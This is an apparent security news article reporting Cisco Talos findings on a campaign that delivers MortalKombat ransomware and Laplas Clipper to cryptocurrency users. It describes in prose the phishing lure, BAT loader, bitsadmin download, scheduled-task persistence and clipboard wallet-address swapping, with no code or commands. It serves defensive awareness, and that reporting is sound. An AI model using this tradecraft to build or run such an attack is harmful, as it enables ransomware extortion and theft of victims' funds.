Unknown threat actors are targeting crypto users with a couple of new threats in a financially motivated campaign active since December 2022. The campaign deploys a variant of the Xorist commodity ransomware named MortalKombat and a GO variant of the Laplas Clipper malware.
About the campaign
Cisco Talos found that the campaign mainly targets victims in the U.S. followed by the U.K, Turkey, and the Philippines.
- The multi-stage attack chain starts with a phishing email containing an attached malicious ZIP file with a BAT loader script. On clicking, the script uses the LoLBin bitsadmin to download a second archive ZIP file from a remote resource.
- The BAT loader script uses another embedded VB script to inflate the downloaded archive automatically and drops the final payload that is either Laplas Clipper or MortalKombat.
- It executes and runs the payload and finally deletes evidence of malicious files to cover their tracks and make detection/analysis harder.
- Threat actors are scanning the internet for victim machines with an exposed RDP port 3389, using one of their download servers that run an RDP crawler.
Notably, the malware and ransomware, both establish persistence on the victim’s machine.
MortalKombat infection summary
- The phishing mail pretends to be from CoinPayments and contains a malicious ZIP file with a filename resembling a transaction ID mentioned in the email body.
- Attackers lure victims to unzip the malicious attachment and view the contents, which is a malicious BAT loader. The loader drops, runs, and executes MortalKombat.
- The ransomware is capable of encrypting various files on the victim machine’s filesystem, such as application, backup, database, system, and virtual machine files, as well as files on the remote locations mapped as logical drives in the victim’s machine.
- It doesn’t show wiper behavior but renders the victim’s system inoperable by corrupting Windows Explorer, removing applications and folders from Windows startup, and disabling the Run command window on the system.
- Finally, it drops the ransom note, changes the victim machine’s wallpaper upon the encryption process, and uses qTOX or ProtonMail to communicate with the victim.
Laplas Clipper attack chain
Laplas Clipper is used to stealing a number of cryptocurrency wallet addresses, including Dash, Bitcoin, Bitcoin Cash, Zcash, Litecoin, Ethereum, Binance coin, Dogecoin, Monero, Ripple, Tezos, Ronin, Tron, Cardano, and Cosmos, by hijacking crypto transactions. Here's how the attack unwraps:
- First of all, the Clipper uses the string decryption function and creates a Windows scheduled task by executing the schtasks command.
- The scheduled task monitors the victim’s clipboard for a cryptocurrency wallet address and sends the found wallet address to the attacker-controlled Clipper bot.
- The bot will generate a lookalike wallet address and overwrite it to the victim’s machine’s clipboard, which will subsequently result in a fraudulent cryptocurrency transaction.
Summing up
A single campaign delivering malware and ransomware highlights the desperate efforts of threat actors to target the emerging landscape of cryptocurrency. MortalKombat isn't a very sophisticated one at the moment, whereas Laplas Clipper operators are continuously releasing updates. Thus, potential targets should watch carefully against convincing emails and have offline backups for the worst-case scenario.
Publisher
/https://cyware-ent.s3.amazonaws.com/image_bank/285c_shutterstock_2160496255.jpg)
/https://cyware-ent.s3.amazonaws.com/image_bank/dc5e_shutterstock_2137434635.jpg)
